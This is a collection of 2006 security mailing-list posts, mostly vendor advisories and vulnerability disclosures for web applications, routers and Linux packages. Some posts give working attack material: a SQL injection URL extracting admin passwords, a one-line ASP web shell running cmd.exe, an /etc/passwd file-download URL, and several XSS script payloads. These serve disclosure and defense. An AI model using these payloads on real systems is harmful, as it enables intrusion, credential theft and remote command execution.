Re: Ashop Search Module SQL injection
On Tue, 13 Jun 2006, [EMAIL PROTECTED] wrote: : http://[SITE]/default.asp?mod=searchtype=simpleq=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+cmdSearch=Search : : credits: EntriKa The_BeKiR erne Which Ashop is this? AShop Software www.ashopsoftware.com/ Ashop Shopping Cart Software www.ashop.com.au/ ASHOP www.ashop.com.hk/ Ashop www.ashop.co.il/ Ashop www.ashop.at/ ashop.co.uk www.ashop.co.uk/ [..] Something else?
[ MDKSA-2006:131 ] - Updated perl-Net-Server packages fix format string vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:131 http://www.mandriva.com/security/ ___ Package : perl-Net-Server Date: July 25, 2006 Affected: Corporate 3.0 ___ Problem Description: Peter Bieringer discovered a flaw in the perl Net::Server module where the log function was not safe against format string exploits in version 0.87 and earlier. Updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1127 ___ Updated Packages: Corporate 3.0: 33e4382b4ad9bf5a1894298a468895e8 corporate/3.0/RPMS/perl-Net-Server-0.85-3.1.C30mdk.noarch.rpm 9294cea422b1a149b5a13ad4f8824780 corporate/3.0/SRPMS/perl-Net-Server-0.85-3.1.C30mdk.src.rpm Corporate 3.0/X86_64: 891bb910d688342cf8a9fde373694b70 x86_64/corporate/3.0/RPMS/perl-Net-Server-0.85-3.1.C30mdk.noarch.rpm 9294cea422b1a149b5a13ad4f8824780 x86_64/corporate/3.0/SRPMS/perl-Net-Server-0.85-3.1.C30mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) iD8DBQFExln1mqjQ0CJFipgRAqUdAJwIP9LgzvoCJGwOiuRjuqezD8h50gCg07Vg hpJ3I8a6FOiUg82/pAASvTE= =uUzj -END PGP SIGNATURE-
Full Path Disclosure xGuestBook v1.02
###Dicomdk Full Path Disclosure xGuestBook v1.02# # http://xatrix.xa.funpic.de/xguestbook2/ # # By : X-boy # ## http://[HOST]/post.php Test : http://xatrix.xa.funpic.de/xguestbook2/post.php Result : Notice: Undefined index: user in [site]\post.php on line 15 Notice: Undefined index: mail in [site]\post.php on line 16 Notice: Undefined index: p in [site]\post.php on line 17 Notice: Undefined index: url in [site]\post.php on line 19 ## Patch : # ## -Open post.php -Find : $user = HTMLSPECIALCHARS(trim($_POST['user'])); $email = HTMLSPECIALCHARS(trim($_POST['mail'])); $post = nl2br(HTMLSPECIALCHARS($_POST['p'])); $post = str_replace( , nbsp;,$post); $url = HTMLSPECIALCHARS(trim($_POST['url'])); $date = date(Y-m-d g:i:s); -Change to : if (isset($_POST['user']) AND isset($_POST['mail']) AND isset($_POST['p']) AND isset($_POST['url'])) { $user = HTMLSPECIALCHARS(trim($_POST['user'])); $email = HTMLSPECIALCHARS(trim($_POST['mail'])); $post = nl2br(HTMLSPECIALCHARS($_POST['p'])); $post = str_replace( , nbsp;,$post); $url = HTMLSPECIALCHARS(trim($_POST['url'])); $date = date(Y-m-d g:i:s); } ##
MS06-034 lies? IIS 6 can still be owned?
Hi all. After early getting the details of MS06-034 I thought it will be cool to build the exploits since there has been long time without any IIS exploit and our customers (see *1) will like it, so I asked the guys to build the exploits and that I will take care of the part of elevating privileges since I had some theory that there was a way to elevate privileges. What was funny is that some time later I realized that if you can upload an asp page then it's pretty simple to have a remote shell running under the same account that the exploits would run: -shell.asp (got this from xfocus.org)-- %=server.createobject(wscript.shell).exec(cmd.exe /c request(command)).stdout.readall% --- So I wonder why MS patched the vulnerability if it's pretty simple to have a remote shell on default configurations? Mabye because wscript.shell can be disabled, removed, etc. or you can't run nor upload .exe on the server, in these cases the exploit will be handy. Also MS stated: - on Mitigating Factors On IIS 5.0 and IIS 5.1, ASP enabled applications by default run in the 'Pooled Out of Process' application, which means they run in DLLHOST.exe, which is running in the context of the low privilege IWAM_machinename account. By default, ASP is not enabled on IIS 6.0. If ASP is enabled, it runs in the context of a W3WP.exe worker process running as the low privilege 'NetworkService' account. on FAQ Workarounds... -What might an attacker use the vulnerability to do? An attacker who successfully exploited this vulnerability could take complete control of the affected system. -- That's pretty confusing since they are saying IIS 5 6 runs under a low privileged accounts and then they say an attacker could take complete control...??? My theory on the elevation of privileges was in part wrong but I could elevate privileges so now the exploits can also give you a remote shell under an administrative account which I think this is why MS patched the vulnerability. While MS fixed the ASP vulnerability they didn't fixed a design flaw that allows to elevate privilges if you can run code under IIS 5 6 low privileged accounts :) So no matter if you applied the fix, if you let users to upload an run binaries from ASP pages on default settings then your server can still be owned. Cesar. (*1 http://www.argeniss.com/products.html) __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
Secunia Research: AutoVue SolidModel Professional Buffer Overflow Vulnerability
== Secunia Research 26/07/2006 - AutoVue SolidModel Professional Buffer Overflow Vulnerability - == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * AutoVue SolidModel Professional Desktop Edition version 19.1 Build 5993. Other versions may also be affected. == 2) Severity Rating: Moderately Critical Impact: System Access Where: Remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in AutoVue SolidModel Professional Desktop Edition, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to a boundary error within the handling of ARJ, RAR, and ZIP archives. This can be exploited to cause a stack-based buffer overflow when a malicious archive containing a file with an overly long filename is opened. Successful exploitation allows execution of arbitrary code. == 4) Solution Do not open untrusted archives. == 5) Time Table 07/07/2006 - Initial vendor notification. 12/07/2006 - Second vendor notification. 19/07/2006 - Third vendor notification. 26/07/2006 - Public disclosure. == 6) Credits Discovered by Tan Chew Keong, Secunia Research. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-3350 for the vulnerability. == 8) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-56/advisory/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
[USN-297-3] Thunderbird vulnerabilities
=== Ubuntu Security Notice USN-297-3 July 26, 2006 mozilla-thunderbird vulnerabilities CVE-2006-2775, CVE-2006-2776, CVE-2006-2778, CVE-2006-2779, CVE-2006-2780, CVE-2006-2781, CVE-2006-2783, CVE-2006-2784, CVE-2006-2787 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: mozilla-thunderbird 1.0.8-0ubuntu05.04.1 Ubuntu 5.10: mozilla-thunderbird 1.0.8-0ubuntu05.10.2 After a standard system upgrade you need to restart Thunderbird to effect the necessary changes. Details follow: USN-297-1 fixed several vulnerabilities in Thunderbird for the Ubuntu 6.06 LTS release. This update provides the corresponding fixes for Ubuntu 5.04 and Ubuntu 5.10. For reference, these are the details of the original USN: Jonas Sicking discovered that under some circumstances persisted XUL attributes are associated with the wrong URL. A malicious web site could exploit this to execute arbitrary code with the privileges of the user. (MFSA 2006-35, CVE-2006-2775) Paul Nickerson discovered that content-defined setters on an object prototype were getting called by privileged UI code. It was demonstrated that this could be exploited to run arbitrary web script with full user privileges (MFSA 2006-37, CVE-2006-2776). Mikolaj Habryn discovered a buffer overflow in the crypto.signText() function. By sending an email with malicious JavaScript to an user, and that user enabled JavaScript in Thunderbird (which is not the default and not recommended), this could potentially be exploited to execute arbitrary code with the user's privileges. (MFSA 2006-38, CVE-2006-2778) The Mozilla developer team discovered several bugs that lead to crashes with memory corruption. These might be exploitable by malicious web sites to execute arbitrary code with the privileges of the user. (MFSA 2006-32, CVE-2006-2779, CVE-2006-2780) Masatoshi Kimura discovered a memory corruption (double-free) when processing a large VCard with invalid base64 characters in it. By sending a maliciously crafted set of VCards to a user, this could potentially be exploited to execute arbitrary code with the user's privileges. (MFSA 2006-40, CVE-2006-2781) Masatoshi Kimura found a way to bypass web input sanitizers which filter out JavaScript. By inserting 'Unicode Byte-order-Mark (BOM)' characters into the HTML code (e. g. 'scr[BOM]ipt'), these filters might not recognize the tags anymore; however, Thunderbird would still execute them since BOM markers are filtered out before processing a mail containing JavaScript. (MFSA 2006-42, CVE-2006-2783) Kazuho Oku discovered various ways to perform HTTP response smuggling when used with certain proxy servers. Due to different interpretation of nonstandard HTTP headers in Thunderbird and the proxy server, a malicious HTML email can exploit this to send back two responses to one request. The second response could be used to steal login cookies or other sensitive data from another opened web site. (MFSA 2006-33, CVE-2006-2786) It was discovered that JavaScript run via EvalInSandbox() can escape the sandbox. Malicious scripts received in emails containing JavaScript could use these privileges to execute arbitrary code with the user's privileges. (MFSA 2006-31, CVE-2006-2787) Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.8-0ubuntu05.04.1.diff.gz Size/MD5:98300 a4dffa1705bd280224188e7bbc7781dd http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.8-0ubuntu05.04.1.dsc Size/MD5: 946 7eebd4d62af685dd0ce74d5ff741c92c http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.0.8.orig.tar.gz Size/MD5: 32849510 ae345f1b722d8f3a977af4fd358d27b0 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.0.8-0ubuntu05.04.1_amd64.deb Size/MD5: 3347854 519c296b742dc6e6d5c308b0b6c5a433 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.0.8-0ubuntu05.04.1_amd64.deb Size/MD5: 145244 9a8d5c4ade62afdb187022df1b188099 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-offline_1.0.8-0ubuntu05.04.1_amd64.deb Size/MD5:27718 aa28f71d2133d0810bbf166d86c68dc7
[USN-320-2] php4 regression
=== Ubuntu Security Notice USN-320-2 July 26, 2006 php4 regression https://launchpad.net/bugs/53581 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: libapache2-mod-php4 4:4.3.10-10ubuntu4.6 php4-cgi 4:4.3.10-10ubuntu4.6 php4-cli 4:4.3.10-10ubuntu4.6 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-320-2 fixed several vulnerabilities in PHP. James Manning discovered that the Ubuntu 5.04 update introduced a regression, the function tempnam() caused a crash of the PHP interpreter in some circumstances. The updated packages fix this. We apologize for the inconvenience. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.6.diff.gz Size/MD5: 281956 1c914659e6f61602a9f71b8d37b3392b http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.6.dsc Size/MD5: 1469 17a8050464f1dbbb1fabb99343a5c6cf http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10.orig.tar.gz Size/MD5: 4892209 73f5d1f42e34efa534a09c6091b5a21e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4_4.3.10-10ubuntu4.6_all.deb Size/MD5: 1126 a05b26a1ea93b28d73b94422da467918 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.10-10ubuntu4.6_amd64.deb Size/MD5: 1657558 9d8d66e9cb31cb87294b6233fa927e33 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.10-10ubuntu4.6_amd64.deb Size/MD5: 3275316 4423f48ce31f2f3334506b23f02fedb8 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cli_4.3.10-10ubuntu4.6_amd64.deb Size/MD5: 1647604 e79fed2516655fc81564e8fe0f488bea http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-common_4.3.10-10ubuntu4.6_amd64.deb Size/MD5: 168258 5252917d283455beea87dcfcd80d3bbf http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-dev_4.3.10-10ubuntu4.6_amd64.deb Size/MD5: 348252 d38144e70507eeeaccd0f0eb88201332 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.10-10ubuntu4.6_i386.deb Size/MD5: 1592844 ab4f524bf3b203661ca083fc6cbefb00 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.10-10ubuntu4.6_i386.deb Size/MD5: 3169886 0b56067b59dd1612562dc82fc6eede43 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cli_4.3.10-10ubuntu4.6_i386.deb Size/MD5: 1592924 86addeffabaa817733857dfed3e37b29 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-common_4.3.10-10ubuntu4.6_i386.deb Size/MD5: 168254 f0ed0ff02813d768a8e600f3646382ba http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-dev_4.3.10-10ubuntu4.6_i386.deb Size/MD5: 348266 70238b0ae0790cd79c645720e66eae19 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/p/php4/libapache2-mod-php4_4.3.10-10ubuntu4.6_powerpc.deb Size/MD5: 1658990 5769a9d9690042900e70f98432ed7d7a http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cgi_4.3.10-10ubuntu4.6_powerpc.deb Size/MD5: 3278826 9a2287a0bf8e587ee651230d8e40b797 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-cli_4.3.10-10ubuntu4.6_powerpc.deb Size/MD5: 1646196 a001bf1a15d25ae4354190d8c722e846 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-common_4.3.10-10ubuntu4.6_powerpc.deb Size/MD5: 168268 37293b3c08d1593bb55b73bce39cf6c3 http://security.ubuntu.com/ubuntu/pool/main/p/php4/php4-dev_4.3.10-10ubuntu4.6_powerpc.deb Size/MD5: 348282 257afdf00afb930d1fb294d12454ae3a signature.asc Description: Digital signature
EzUpload multi file vulnerabilities
I don't know anyone report this but I have detected this when test EzUpload Pro 2.2.0 Attacker can re-config EzUpload system without login. File: filter.php -- change Extensions Mode file type. File: access.php -- change Protection Method accept anyone upload file File: edituser.php -- Add user who can upload File: settings.php -- Change admin informations File: index.php -- Upload file without login even system require login Check it and fun
Multiple vulnerabilities in OpenCMS
Multiple access control and input validation vulnerabilities in ~~~ OpenCMS (Open Source Website Content Management System) ~~~ 0. ORIGINAL ADVISORY http://o0o.nu/~meder/OpenCMS_multiple_vulnerabilities.txt I. BACKGROUND ~ OpenCms is a professional level Open Source Website Content Management System. OpenCms helps to create and manage complex websites easily without knowledge of html. OpenCms is based on Java and XML technology. [1] II. DESCRIPTION ~~~ OpenCms versions 6.2.1, 6.2, 6.0.3, 6.0.4 (possibly older versions too) are vulnerable to multiple access control and input validation vulnerabilities, which allow authenticated users to perform the following unauthrozied actions: * View and download application's log file; * Download arbitrary files from the system; * View sources of JSP files (provided they are locked by some other user); * Add webusers; * Upload new OpenCms modules; * Overwrite existing OpenCms modules; * Upload database import/export files; * Overwrite existing database import/export files; * Send broadcast messages to all users; * Send JavaScript to any user (XSS); * Obtain list of all users and groups Most of the access control vulnerabilities mentioned above can be exploited by accessing the URL that provides the functionality, while logged in as unprivileged user(member of Users group). The following URLs (wrapped) can be used to reproduce the vulnerabilities on OpenCms v.6.2: * View and download application's log file: http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp? path=%2Fworkplace%2Flogfileview * Download arbitrary files from the system: http://[target]/opencms/opencms/system/workplace/admin/workplace/logfileview/ downloadTrigger.jsp?filePath=/etc/passwd * View sources of JSP files (JSP file must be locked by any other user): http://[target]/opencms/opencms/system/workplace/editors/editor.jsp? resource=/index.jsp * Add webusers: http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp? path=%2Faccounts%2Fwebusers/new * Upload new OpenCms modules (by uploading the file with the name of existing module, it will be overwritten): http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp? path=%2Fmodules%2Fmodules_import * Upload database import/export files (by uploading the file with the name of existing import/export file, it will be overwritten): http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp? path=%2Fdatabase%2Fimporthttp * Send broadcast messages to all users: http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp? path=%2Fworkplace%2Fbroadcast * Send arbitrary JavaScript to any user. Input the following JavaScript as message body to be executed in browser of user(s) message is destined to (XSS): /script scripta=/XSS BUG/; alert(a.source)/script * Obtain list of all users: http://[target]/opencms/opencms/system/workplace/views/admin/admin-main.jsp? path=%2Faccounts/users Vulnerabilities outlined above may lead to server compromise, loss of confidentiality and integrity of data stored on the server. III. VENDOR STATUS ~~ Version 6.2.2 has been released to address discovered vulnerabilities. New version is available at: http://www.opencms.org/opencms/en/download/opencms.html IV. DISCLOSURE TIMELINE ~~~ 13/07/2006 - Bugreport describing the vulnerabilities submitted 18/07/2006 - Initial vendor response acknowledging issues 20/07/2006 - Fixes commited to CVS 21/07/2006 - New version(6.2.2) of OpenCMS addressing the issues released V. ACKNOWLEDGEMENTS ~~~ Alexander Kandzior and Andreas Zahner for timely response and resolution of issues. VI. REFERENCES ~~ 1. OpenCms (Open Source Website Content Management System) homepage, http://www.opencms.org/ 2. XSS Cheat sheet, http://ha.ckers.org/xss.html 3. WebScarab, http://www.owasp.org/software/webscarab.html -- http://o0o.nu/~meder
[SECURITY] [DSA 1111-2] New Linux kernel 2.6.8 packages fix privilege escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA -2[EMAIL PROTECTED] http://www.debian.org/security/ Dann Frazier July 26th, 2006 http://www.debian.org/security/faq - -- Package: kernel-source-2.6.8 et. al. Vulnerability : race condition Problem-Type : local Debian-specific: no CVE ID : CVE-2006-3625 It was discovered that a race condition in the process filesystem can lead to privilege escalation. The following matrix explains which kernel version for which architecture fixes the problem mentioned above: Debian 3.1 (sarge) Source 2.6.8-16sarge4 Alpha architecture 2.6.8-16sarge4 AMD64 architecture 2.6.8-12sarge4 Intel IA-32 architecture2.6.8-16sarge4 Intel IA-64 architecture2.6.8-14sarge4 PowerPC architecture2.6.8-12sarge4 Sun Sparc architecture 2.6.8-15sarge4 IBM S/390 2.6.8-5sarge4 Motorola 680x0 2.6.8-4sarge4 HP Precision2.6.8-6sarge3 FAI 1.9.1sarge3 The initial advisory lacked builds for the IBM S/390, Motorola 680x0 and HP Precision architectures, which are now provided. Also, the kernels for the FAI installer have been updated. We recommend that you upgrade your kernel package immediately and reboot the machine. If you have built a custom kernel from the kernel source package, you will need to rebuild to take advantage of these fixes. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-16sarge4.dsc Size/MD5 checksum: 812 ff4792fd28cadb6774ae4310ce38e301 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-alpha/kernel-image-2.6.8-alpha_2.6.8-16sarge4.tar.gz Size/MD5 checksum:38839 e4d527c319269df165cc23fd6fb54a68 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-16sarge4.dsc Size/MD5 checksum: 1103 7dc33f6d9079af9d79b05d6ece3dfdc5 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-amd64/kernel-image-2.6.8-amd64_2.6.8-16sarge4.tar.gz Size/MD5 checksum:75714 264ee72864b022045cc4b0820fe062db http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-14sarge4.dsc Size/MD5 checksum: 1191 0fb79cfacfc5581263710440357ed5ce http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-ia64/kernel-image-2.6.8-ia64_2.6.8-14sarge4.tar.gz Size/MD5 checksum:64204 02b5b536eebb207995ef3a754de1c87e http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-16sarge4.dsc Size/MD5 checksum: 1047 62f42ea9f118d911a8f215af2f3e586d http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-i386/kernel-image-2.6.8-i386_2.6.8-16sarge4.tar.gz Size/MD5 checksum:90861 885cb72bd69153dcd6512db147caa173 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-15sarge4.dsc Size/MD5 checksum: 1036 00d330ff015d713c4652ea05cf91 http://security.debian.org/pool/updates/main/k/kernel-image-2.6.8-sparc/kernel-image-2.6.8-sparc_2.6.8-15sarge4.tar.gz Size/MD5 checksum:24447 393b640388a78dd98c727a08f972214c http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-16sarge4.dsc Size/MD5 checksum: 1002 bca4e80e8a10ba3c0884e3fab032772b http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8-16sarge4.diff.gz Size/MD5 checksum: 1044761 b6675f6ac09f5d31f780650798c5609c http://security.debian.org/pool/updates/main/k/kernel-source-2.6.8/kernel-source-2.6.8_2.6.8.orig.tar.gz Size/MD5 checksum: 43929719 0393c05ffa4770c3c5178b74dc7a4282 http://security.debian.org/pool/updates/main/k/kernel-patch-powerpc-2.6.8/kernel-patch-powerpc-2.6.8_2.6.8-12sarge4.dsc Size/MD5 checksum: 1071 4bb132bef3f8f2a220ad9e74ab76500e
Re: Write-up by Amit Klein: Forging HTTP request headers with Flash
Hi A reader going by the nickname xeek pointed out to me that the examples in the paper making use of the HTTP GET request do not work as-is (thanks xeek!). After looking at the matter, I realized that I made a silly mistake. In my research, I toyed with the LoadVars.send() method with 2 arguments (url and target window), and had Flash automatically select the appropriate methd (GET if empty body, POST if non-empty body). The exploit works fine this way. When I documented my findings, I decided to explicitly add the HTTP method, to clarify the write-up. BIG mistake - turns out that in such case, Flash doesn't send the headers if GET is used (sounds like a bug...). And pity I didn't verify the exact code I used in the write-up... Anyway, to summarize - there's a mistake in the document, and it's easily fixed. In each GET example, simply remove the explicit method (i.e. delete all instances of ,GET in the write-up). For example (the first example in the paper): [...] req.send(http://www.vuln.site/some/page.cgi?p1=v1p2=v2;, _blank); This works as advertised, and as also verified by xeek. Thanks, and sorry for the mistake, -Amit
wwwThreads XSS
#-- #Aria-Security.net Advisory #Discovered by: l2odon # www.Aria-security.net #Gr33t to: A.u.r.a O.U.T.L.A.W [EMAIL PROTECTED] @ DrtRp Cl0wn #--- #Software: wwwThreads #Attack method: Cross Site Scripting #Original advisory:http://www.aria-security.net/advisory/wwwthreads.txt # # # #Proof of Concept: # #http://www.site.com/[path]/calendar.php?week=;scriptalert('test!')/script # #-- # #Solution #contact me: [EMAIL PROTECTED] # #--
Zyxel Prestige 660H-61 Cross-Site Scripting
Zyxel Prestige 660H-61 Cross-Site Scripting Tested on Zyxel Prestige 660H-61 ZyNOS F/W Version: V3.40(PT.0)b32 | 1/28/2005 Standard:NORMAL Discovered by: José Ramón Palanco: jose.palanco(at)eazel(dot).es http://www.eazel.es Description: Zyxel Prestige 660H-61 ADSL Router is vulnerable to a security vulnerability that allow Cross-Site Scripting attacks. Due to improper filtering, a remote attacker can cause a cross site scripting in this script: http://router/Forms/rpSysAdmin?a=%3Cscript%3Ealert('www.eazel.es')%3C/script%3E Original advisory: http://www.eazel.es/media/advisory004-Zyxel-Prestige-660H-61-Cross-Site-Scripting.html
Professional Home Page Tools Login Script Cross Site Scripting Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Advisory: Professional Home Page Tools Login Script Cross Site Scripting Vulnerabilities Release Date: 2006/07/25 Last Modified: 2006/07/25 Author: Tamriel [tamriel at gmx dot net] Application: Professional Home Page Tools Login Script Risk: Low Vendor Status: contacted Vendor Site: www.php-tools.eu Overview: Quote from .php-tools.eu Dieses Login Script bietet Ihnen einfache Features, um Ihre Webinhalte zu schuetzen. Die Registrierung kann deaktiviert werden, wenn Sie nicht möchten, dass sich weitere Benutzer anmelden. Das integrierte Content Management System bietet Ihnen die Moeglichkeit Webinhalte nur für eingeloggte Benutzer sichbar zu machen. Details: In the register formular only the email adress will be checked. In all other fields you can insert HTML tags or something like that. Version note: I havent found some information about the actual version of this script, so take a look on the md5 hashes of my proofed files: f598cc788dd1a45677cf7cb6ee6d3b5b functions.php ba2a2c5792cdd77151341c5fa78ecbfc index.php c2e3e52bcd02cfc1103e79aa14e721ce main.php Solution: Take a view on PHP's htmlentities function. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 iD8DBQFExnfjqBhP+Twks7oRAtMrAJ4n0Mqn+PAV2IBw4+9RSWNxAh5zcACghGoS kaVRqWxPicQ6mIrzgGFaLDw= =MniK -END PGP SIGNATURE-
PHP-Auction SQL injection
#-- #Aria-Security.net Advisory #Discovered by: l2odon # www.Aria-security.net #Gr33t to: A.u.r.a O.U.T.L.A.W [EMAIL PROTECTED] @ DrtRp Cl0wn #--- #Software: PHP-Auction #Vendor: http://www.vhcs.net #Attack method: SQL Injection #Original advisory:http://www.aria-security.net/advisory/phpauction.txt # # # #Proof of Concept: # #http://www.site.com/phpbb/auction_room.php?ar=[num][sql] #http://www.site.com/phpbb/auction_rating.php?mode=viewu=[num][sql] #http://www.site.com/phpbb/auction_store.php?mode=storeu=[num][sql] #http://www.site.com/phpbb/auction_room.php?order=price_ascar=[num][sql] # #-- # #Solution #contact me: [EMAIL PROTECTED] # #--
TP-Book = 1.00 Cross Site Scripting Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Advisory: TP-Book = 1.00 Cross Site Scripting Vulnerabilities Release Date: 2006/07/25 Last Modified: 2006/07/25 Author: Tamriel [tamriel at gmx dot net] Application: TP-Book = 1.00 Risk: Low Vendor Status: not contacted Vendor Site: tobias.kloy.googlepages.com Overview: Quote from tobias.kloy.googlepages.com: Das Gaestebuch verfuegt über folgende Features: - Anpassbare Templates - Viele Systeme, um Dauerspammer auszuschließen - Admincontrol-Panel - Einfache Installation durch einen Wizard Details: In your guestbook posts the name will not be checked by the script. Attackers can so perform cross site scripting attacks. Solution: Take a view on PHP's htmlentities function. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 iD8DBQFExnkWqBhP+Twks7oRAo+tAJ9xQfU3nR2GdQFpihUfYvZMRcjeOACeM5u8 9pRIeeb4mDLWby9rlVGfMsU= =sTzT -END PGP SIGNATURE-
ZDI-06-023: eIQNetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerability
ZDI-06-023: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-023.html July 25, 2006 -- CVE ID: CVE-2006-3838 -- Affected Vendor: eIQnetworks -- Affected Products: eIQnetworks Enterprise Security Analyzer Astaro Report Manager (OEM) Fortinet FortiReporter (OEM) iPolicy Security Reporter (OEM) SanMina Viking Multi-Log Manager (OEM) Secure Computing G2 Security Reporter (OEM) Top Layer Network Security Analyzer (OEM) -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since by Digital Vaccine protection filter ID N/A. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of eIQnetworks Enterprise Security Analyzer. Authentication is not required to exploit this vulnerability. The specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port. -- Vendor Response: eIQnetworks has issued an update to correct this vulnerability. More details can be found at: http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf -- Disclosure Timeline: 2006.05.10 - Vulnerability reported to vendor - Digital Vaccine released to TippingPoint customers 2006.07.25 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Titon, JxT, KF and the rest of Bastard Labs. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: 